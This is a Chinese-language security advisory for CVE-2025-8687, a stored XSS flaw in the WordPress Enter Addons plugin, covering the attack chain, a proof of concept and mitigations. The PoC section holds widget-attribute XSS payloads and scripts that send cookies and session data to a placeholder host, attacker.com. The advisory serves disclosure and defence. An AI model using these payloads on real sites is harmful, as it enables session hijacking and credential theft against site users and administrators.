CVE-2025-8687 WordPress Enter Addons插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-8687

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Enter Addons plugin for WordPress

漏洞概述

CVE-2025-8687是WordPress Enter Addons插件中的一个存储型跨站脚本(XSS)漏洞。该插件是一款流行的WordPress页面构建和组件库插件，提供倒计时器、图片比较等小部件功能。漏洞源于插件对用户输入的属性值缺乏充分的输入清理(input sanitization)和输出转义(output escaping)，导致恶意JavaScript代码可被存储在数据库中。当其他用户访问包含恶意代码的页面时，攻击脚本将在受害者浏览器中执行。由于攻击者需要具有贡献者(contributor)级别或更高的WordPress用户权限才能利用此漏洞，因此属于低权限账号可利用的存储型XSS漏洞。攻击成功可导致会话劫持、敏感信息窃取、管理后台操作等严重后果。

技术细节

该漏洞存在于Enter Addons插件的Countdown(倒计时器)和Image Comparison(图片比较)两个小部件中。攻击者通过这两个组件的某个属性参数注入恶意JavaScript代码。插件在接收用户输入时未使用esc_html、esc_attr等WordPress安全函数进行适当清理，且在输出时未对动态内容进行转义处理。攻击流程如下：1)拥有贡献者权限的攻击者在页面编辑时，通过小部件属性注入XSS payload如<script>alert(document.cookie)</script>；2)恶意代码被保存到WordPress数据库中；3)当其他用户访问该页面时，服务器从数据库读取并输出未转义的内容；4)受害者浏览器将其作为合法脚本执行，从而触发XSS攻击。由于存储型XSS的特点，攻击代码会持久存在于所有访问该页面的用户浏览器中。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用的WordPress Enter Addons插件版本，确认版本在2.2.7或更早版本

STEP 2

账号获取

攻击者获取WordPress网站的贡献者(Contributor)级别或更高权限的用户账号

STEP 3

漏洞利用

在页面编辑器中使用Countdown或Image Comparison小部件，在属性字段中注入恶意JavaScript代码

STEP 4

代码存储

包含XSS payload的页面内容被保存到数据库中，形成持久化攻击点

STEP 5

触发攻击

普通用户或管理员访问包含恶意代码的页面，浏览器执行注入的JavaScript脚本

STEP 6

数据窃取

攻击者通过JavaScript获取用户cookie、会话令牌等敏感信息，实现会话劫持或凭据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress Enter Addons Plugin XSS PoC for CVE-2025-8687 -->
<!-- Requires Contributor+ role in WordPress -->

<!-- Method 1: Via Countdown Widget -->
<div data-date="2025-12-31" data-end-text="<img src=x onerror='alert(document.cookie)'>" class="ea-countdown-timer">
    <div class="ea-countdown-inner"></div>
</div>

<!-- Method 2: Via Image Comparison Widget -->
<div class="ea-image-comparison" data-before-label="<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>" data-after-label="After">
    <img src="before.jpg" alt="Before">
    <img src="after.jpg" alt="After">
</div>

<!-- Method 3: Generic XSS Payload -->
<script>
    // Steal admin cookies/session
    fetch('https://attacker.com/api/collect', {
        method: 'POST',
        body: JSON.stringify({
            cookies: document.cookie,
            url: window.location.href,
            userAgent: navigator.userAgent
        })
    });
</script>

影响范围

Enter Addons plugin for WordPress <= 2.2.7

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时措施：1)临时禁用或删除Enter Addons插件的Countdown和Image Comparison小部件；2)对所有使用这些小部件的页面进行安全审查，手动清理可能的恶意代码；3)启用WordPress的内容安全策略(CSP)头部；4)限制WordPress用户的编辑权限，避免低权限账号创建可疑页面内容；5)监控网站日志，关注异常的JavaScript请求和外部数据发送行为。